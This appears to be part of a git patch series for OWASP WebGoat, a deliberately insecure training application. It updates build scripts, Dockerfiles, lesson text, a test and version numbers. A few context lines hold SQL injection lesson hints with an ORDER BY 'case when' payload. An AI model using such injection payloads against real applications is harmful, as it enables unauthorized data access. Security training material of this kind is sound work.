--spring.datasource.url=jdbc:hsqldb:hsql://webgoat:9001/webgoat --server.address=0.0.0.0 \ No newline at end of file diff --git a/scripts/build-all.sh b/scripts/build-all.sh old mode 100644 new mode 100755 index 7835dff20..319854ac2 --- a/scripts/build-all.sh +++ b/scripts/build-all.sh @@ -7,13 +7,13 @@ SUCCESS=$? nc -zv 127.0.0.1 9090 2>/dev/null SUCCESS=${SUCCESS}$? -if [[ "${SUCCESS}" -eq 00 ]] ; then +if [[ "${SUCCESS}" -eq 0 ]] ; then echo "WebGoat and or WebWolf are still running, please stop them first otherwise unit tests might fail!" exit 127 fi -mvn clean install +sh mvnw clean install if [[ "$?" -ne 0 ]] ; then exit y$? fi diff --git a/webgoat-server/Dockerfile b/webgoat-server/Dockerfile index 74d0cd4ae..f1b910e52 100644 --- a/webgoat-server/Dockerfile +++ b/webgoat-server/Dockerfile @@ -10,4 +10,7 @@ USER webgoat RUN cd /home/webgoat/; mkdir -p .webgoat-${webgoat_version} COPY target/webgoat-server-${webgoat_version}.jar /home/webgoat/webgoat.jar -EXPOSE 8080 \ No newline at end of file +EXPOSE 8080 + +ENTRYPOINT ["java", "-Djava.security.egd=file:/dev/./urandom", "-jar", "/home/webgoat/webgoat.jar"] +CMD ["--server.port=8080", "--server.address=0.0.0.0"] \ No newline at end of file diff --git a/webwolf/Dockerfile b/webwolf/Dockerfile index a91bcbbce..46598e803 100644 --- a/webwolf/Dockerfile +++ b/webwolf/Dockerfile @@ -8,5 +8,9 @@ RUN \ USER webwolf COPY target/webwolf-${webwolf_version}.jar /home/webwolf/webwolf.jar +COPY start-webwolf.sh /home/webwolf EXPOSE 9090 + +ENTRYPOINT ["/home/webwolf/start-webwolf.sh"] +CMD ["--server.port=9090", "--server.address=0.0.0.0"] \ No newline at end of file diff --git a/webwolf/start-webwolf.sh b/webwolf/start-webwolf.sh new file mode 100755 index 000000000..31f0235e4 --- /dev/null +++ b/webwolf/start-webwolf.sh @@ -0,0 +1,7 @@ +#!/bin/bash + +# Script to start WebWolf, it needs a valid database connection from WebGoat so we wait 8 seconds before starting +# WebWolf application + +echo " Waiting for database to be available..." +sleep 8 && java -Djava.security.egd=file:/dev/./urandom -jar /home/webwolf/webwolf.jar $@ \ No newline at end of file From 9170dcb87f3aaaac46a6e776511b62d0714f2dab Mon Sep 17 00:00:00 2001 From: Shreyas Minocha Date: Sun, 6 Jan 2019 20:43:42 +0530 Subject: [PATCH 26/28] Fix a grammatical error --- .../src/main/resources/i18n/WebGoatLabels.properties | 8 ++++---- .../plugin/introduction/SqlInjectionLesson5aTest.java | 4 ++-- 2 files changed, 6 insertions(+), 6 deletions(-) diff --git a/webgoat-lessons/sql-injection/src/main/resources/i18n/WebGoatLabels.properties b/webgoat-lessons/sql-injection/src/main/resources/i18n/WebGoatLabels.properties index 409f69b6f..3b4a7ff59 100644 --- a/webgoat-lessons/sql-injection/src/main/resources/i18n/WebGoatLabels.properties +++ b/webgoat-lessons/sql-injection/src/main/resources/i18n/WebGoatLabels.properties @@ -20,14 +20,14 @@ SqlStringInjectionHint9=Intercept the request and try to specify a different ord SqlStringInjectionHint10=Use for example "(case when (true) then hostname else id end)" in the order by and see what happens SqlStringInjectionHint11=Use for example "(case when (true) then hostname else id end)" in the order by and see what happens -sql-injection.5a.success=You have succeed: {0} +sql-injection.5a.success=You have succeeded: {0} sql-injection.5a.no.results=No results matched. Try Again. -sql-injection.5b.success=You have succeed: {0} +sql-injection.5b.success=You have succeeded: {0} sql-injection.5b.no.results=No results matched. Try Again. -sql-injection.6a.success=You have succeed: {0} +sql-injection.6a.success=You have succeeded: {0} sql-injection.6a.no.results=No results matched. Try Again. -sql-injection.6b.success=You have succeed: {0} +sql-injection.6b.success=You have succeeded: {0} sql-injection.6b.no.results=No results matched. Try Again. diff --git a/webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat/plugin/introduction/SqlInjectionLesson5aTest.java b/webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat/plugin/introduction/SqlInjectionLesson5aTest.java index d180ca0af..16a6db791 100644 --- a/webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat/plugin/introduction/SqlInjectionLesson5aTest.java +++ b/webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat/plugin/introduction/SqlInjectionLesson5aTest.java @@ -63,7 +63,7 @@ public class SqlInjectionLesson5aTest extends LessonTest { .andExpect(status().isOk()) .andExpect(jsonPath("lessonCompleted", is(true))) - .andExpect(jsonPath("$.feedback", containsString("You have succeed"))) + .andExpect(jsonPath("$.feedback", containsString("You have succeeded"))) .andExpect(jsonPath("$.output").doesNotExist()); } @@ -77,4 +77,4 @@ public class SqlInjectionLesson5aTest extends LessonTest { .andExpect(jsonPath("$.feedback", containsString(messages.getMessage("assignment.not.solved")))) .andExpect(jsonPath("$.output", is("malformed string: '1''"))); } -} \ No newline at end of file +} From b0e3a06b50c069b9035a41b32e8fb54f4af83be4 Mon Sep 17 00:00:00 2001 From: Nanne Baars Date: Thu, 17 Jan 2019 16:33:55 +0100 Subject: [PATCH 27/28] Password reset lesson 5 not working #512 Added comment to not use OWASP ZAP --- .../resources/lessonPlans/en/PasswordReset_host_header.adoc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/webgoat-lessons/password-reset/src/main/resources/lessonPlans/en/PasswordReset_host_header.adoc b/webgoat-lessons/password-reset/src/main/resources/lessonPlans/en/PasswordReset_host_header.adoc index 1daea2dc6..e3601c000 100644 --- a/webgoat-lessons/password-reset/src/main/resources/lessonPlans/en/PasswordReset_host_header.adoc +++ b/webgoat-lessons/password-reset/src/main/resources/lessonPlans/en/PasswordReset_host_header.adoc @@ -14,5 +14,5 @@ The time out is necessary to restrict the attack window, having a link opens up Tom always resets his password immediately after receiving the email with the link. Try to reset the password of Tom (tom@webgoat-cloud.org) to your own choice and login as Tom with -that password. +that password. Note: it is not possible to use OWASP ZAP for this lesson. From 9be4361afc84f861ddd84b013ca0ace71bfd80ed Mon Sep 17 00:00:00 2001 From: Nanne Baars Date: Fri, 18 Jan 2019 08:37:26 +0100 Subject: [PATCH 28/28] New release, updating pom.xml --- pom.xml | 2 +- webgoat-container/pom.xml | 2 +- webgoat-lessons/auth-bypass/pom.xml | 2 +- webgoat-lessons/bypass-restrictions/pom.xml | 2 +- webgoat-lessons/challenge/pom.xml | 2 +- webgoat-lessons/client-side-filtering/pom.xml | 2 +- webgoat-lessons/cross-site-scripting/pom.xml | 2 +- webgoat-lessons/csrf/pom.xml | 2 +- webgoat-lessons/html-tampering/pom.xml | 2 +- webgoat-lessons/http-basics/pom.xml | 2 +- webgoat-lessons/http-proxies/pom.xml | 2 +- webgoat-lessons/idor/pom.xml | 2 +- webgoat-lessons/insecure-deserialization/pom.xml | 2 +- webgoat-lessons/insecure-login/pom.xml | 2 +- webgoat-lessons/jwt/pom.xml | 2 +- webgoat-lessons/missing-function-ac/pom.xml | 2 +- webgoat-lessons/password-reset/pom.xml | 2 +- webgoat-lessons/pom.xml | 4 ++-- webgoat-lessons/sql-injection/pom.xml | 2 +- webgoat-lessons/vulnerable-components/pom.xml | 2 +- webgoat-lessons/webgoat-introduction/pom.xml | 2 +- webgoat-lessons/webwolf-introduction/pom.xml | 2 +- webgoat-lessons/xxe/pom.xml | 2 +- webgoat-server/pom.xml | 2 +- webwolf/pom.xml | 2 +- 25 files changed, 26 insertions(+), 26 deletions(-) diff --git a/pom.xml b/pom.xml index bf6e77a90..dba2c4440 100644 --- a/pom.xml +++ b/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat webgoat-parent pom - v8.0.0-SNAPSHOT + v8.0.0.M22 WebGoat Parent Pom Parent Pom for the WebGoat Project. A deliberately insecure Web Application diff --git a/webgoat-container/pom.xml b/webgoat-container/pom.xml index 2f766037a..347f7e6b1 100644 --- a/webgoat-container/pom.xml +++ b/webgoat-container/pom.xml @@ -10,7 +10,7 @@ org.owasp.webgoat webgoat-parent - v8.0.0-SNAPSHOT + v8.0.0.M22 diff --git a/webgoat-lessons/auth-bypass/pom.xml b/webgoat-lessons/auth-bypass/pom.xml index 0cdc9ef49..0f0a1085e 100644 --- a/webgoat-lessons/auth-bypass/pom.xml +++ b/webgoat-lessons/auth-bypass/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0-SNAPSHOT + v8.0.0.M22 diff --git a/webgoat-lessons/bypass-restrictions/pom.xml b/webgoat-lessons/bypass-restrictions/pom.xml index c1d0102c0..19d00f322 100755 --- a/webgoat-lessons/bypass-restrictions/pom.xml +++ b/webgoat-lessons/bypass-restrictions/pom.xml @@ -6,6 +6,6 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0-SNAPSHOT + v8.0.0.M22 diff --git a/webgoat-lessons/challenge/pom.xml b/webgoat-lessons/challenge/pom.xml index f4a321fd7..565a2e6c7 100644 --- a/webgoat-lessons/challenge/pom.xml +++ b/webgoat-lessons/challenge/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0-SNAPSHOT + v8.0.0.M22 diff --git a/webgoat-lessons/client-side-filtering/pom.xml b/webgoat-lessons/client-side-filtering/pom.xml index aa1d49872..51ab26b6c 100644 --- a/webgoat-lessons/client-side-filtering/pom.xml +++ b/webgoat-lessons/client-side-filtering/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0-SNAPSHOT + v8.0.0.M22 diff --git a/webgoat-lessons/cross-site-scripting/pom.xml b/webgoat-lessons/cross-site-scripting/pom.xml index 6c99401b6..b552ec05c 100644 --- a/webgoat-lessons/cross-site-scripting/pom.xml +++ b/webgoat-lessons/cross-site-scripting/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0-SNAPSHOT + v8.0.0.M22 diff --git a/webgoat-lessons/csrf/pom.xml b/webgoat-lessons/csrf/pom.xml index 2366e85d3..46562563c 100644 --- a/webgoat-lessons/csrf/pom.xml +++ b/webgoat-lessons/csrf/pom.xml @@ -6,6 +6,6 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0-SNAPSHOT + v8.0.0.M22 \ No newline at end of file diff --git a/webgoat-lessons/html-tampering/pom.xml b/webgoat-lessons/html-tampering/pom.xml index 2585104ca..0da8bb5d8 100755 --- a/webgoat-lessons/html-tampering/pom.xml +++ b/webgoat-lessons/html-tampering/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0-SNAPSHOT + v8.0.0.M22 diff --git a/webgoat-lessons/http-basics/pom.xml b/webgoat-lessons/http-basics/pom.xml index 4a2e3959b..a20459465 100644 --- a/webgoat-lessons/http-basics/pom.xml +++ b/webgoat-lessons/http-basics/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0-SNAPSHOT + v8.0.0.M22 diff --git a/webgoat-lessons/http-proxies/pom.xml b/webgoat-lessons/http-proxies/pom.xml index 23c24a5dd..fa45d71a5 100644 --- a/webgoat-lessons/http-proxies/pom.xml +++ b/webgoat-lessons/http-proxies/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0-SNAPSHOT + v8.0.0.M22 diff --git a/webgoat-lessons/idor/pom.xml b/webgoat-lessons/idor/pom.xml index 73e18fbaa..122f12cf5 100644 --- a/webgoat-lessons/idor/pom.xml +++ b/webgoat-lessons/idor/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0-SNAPSHOT + v8.0.0.M22 \ No newline at end of file diff --git a/webgoat-lessons/insecure-deserialization/pom.xml b/webgoat-lessons/insecure-deserialization/pom.xml index 08de6cf6a..4e7e294f1 100755 --- a/webgoat-lessons/insecure-deserialization/pom.xml +++ b/webgoat-lessons/insecure-deserialization/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0-SNAPSHOT + v8.0.0.M22 diff --git a/webgoat-lessons/insecure-login/pom.xml b/webgoat-lessons/insecure-login/pom.xml index faf241a51..cbe489fca 100755 --- a/webgoat-lessons/insecure-login/pom.xml +++ b/webgoat-lessons/insecure-login/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0-SNAPSHOT + v8.0.0.M22 diff --git a/webgoat-lessons/jwt/pom.xml b/webgoat-lessons/jwt/pom.xml index e1856384d..4850d85b6 100644 --- a/webgoat-lessons/jwt/pom.xml +++ b/webgoat-lessons/jwt/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0-SNAPSHOT + v8.0.0.M22 diff --git a/webgoat-lessons/missing-function-ac/pom.xml b/webgoat-lessons/missing-function-ac/pom.xml index 7c2359247..12de5d3cb 100644 --- a/webgoat-lessons/missing-function-ac/pom.xml +++ b/webgoat-lessons/missing-function-ac/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0-SNAPSHOT + v8.0.0.M22 diff --git a/webgoat-lessons/password-reset/pom.xml b/webgoat-lessons/password-reset/pom.xml index 37c437ce9..b6c33f442 100644 --- a/webgoat-lessons/password-reset/pom.xml +++ b/webgoat-lessons/password-reset/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0-SNAPSHOT + v8.0.0.M22 diff --git a/webgoat-lessons/pom.xml b/webgoat-lessons/pom.xml index c6d9f8b75..bb44f17ea 100644 --- a/webgoat-lessons/pom.xml +++ b/webgoat-lessons/pom.xml @@ -5,12 +5,12 @@ org.owasp.webgoat.lesson webgoat-lessons-parent pom - v8.0.0-SNAPSHOT + v8.0.0.M22 org.owasp.webgoat webgoat-parent - v8.0.0-SNAPSHOT + v8.0.0.M22 diff --git a/webgoat-lessons/sql-injection/pom.xml b/webgoat-lessons/sql-injection/pom.xml index d2e50488c..ac6e19f53 100644 --- a/webgoat-lessons/sql-injection/pom.xml +++ b/webgoat-lessons/sql-injection/pom.xml @@ -6,6 +6,6 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0-SNAPSHOT + v8.0.0.M22 \ No newline at end of file diff --git a/webgoat-lessons/vulnerable-components/pom.xml b/webgoat-lessons/vulnerable-components/pom.xml index 22411f819..e04800aee 100644 --- a/webgoat-lessons/vulnerable-components/pom.xml +++ b/webgoat-lessons/vulnerable-components/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0-SNAPSHOT + v8.0.0.M22 diff --git a/webgoat-lessons/webgoat-introduction/pom.xml b/webgoat-lessons/webgoat-introduction/pom.xml index 5e6d2ce7f..e12d7cf05 100644 --- a/webgoat-lessons/webgoat-introduction/pom.xml +++ b/webgoat-lessons/webgoat-introduction/pom.xml @@ -6,6 +6,6 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0-SNAPSHOT + v8.0.0.M22 \ No newline at end of file diff --git a/webgoat-lessons/webwolf-introduction/pom.xml b/webgoat-lessons/webwolf-introduction/pom.xml index a268b0602..afffd26bf 100644 --- a/webgoat-lessons/webwolf-introduction/pom.xml +++ b/webgoat-lessons/webwolf-introduction/pom.xml @@ -6,6 +6,6 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0-SNAPSHOT + v8.0.0.M22 \ No newline at end of file diff --git a/webgoat-lessons/xxe/pom.xml b/webgoat-lessons/xxe/pom.xml index 6d69be448..b5870e3b1 100644 --- a/webgoat-lessons/xxe/pom.xml +++ b/webgoat-lessons/xxe/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0-SNAPSHOT + v8.0.0.M22 diff --git a/webgoat-server/pom.xml b/webgoat-server/pom.xml index 31a304e2f..1744d990c 100644 --- a/webgoat-server/pom.xml +++ b/webgoat-server/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat webgoat-parent - v8.0.0-SNAPSHOT + v8.0.0.M22 diff --git a/webwolf/pom.xml b/webwolf/pom.xml index 385a0fbc5..4a2e40c0a 100644 --- a/webwolf/pom.xml +++ b/webwolf/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat webgoat-parent - v8.0.0-SNAPSHOT + v8.0.0.M22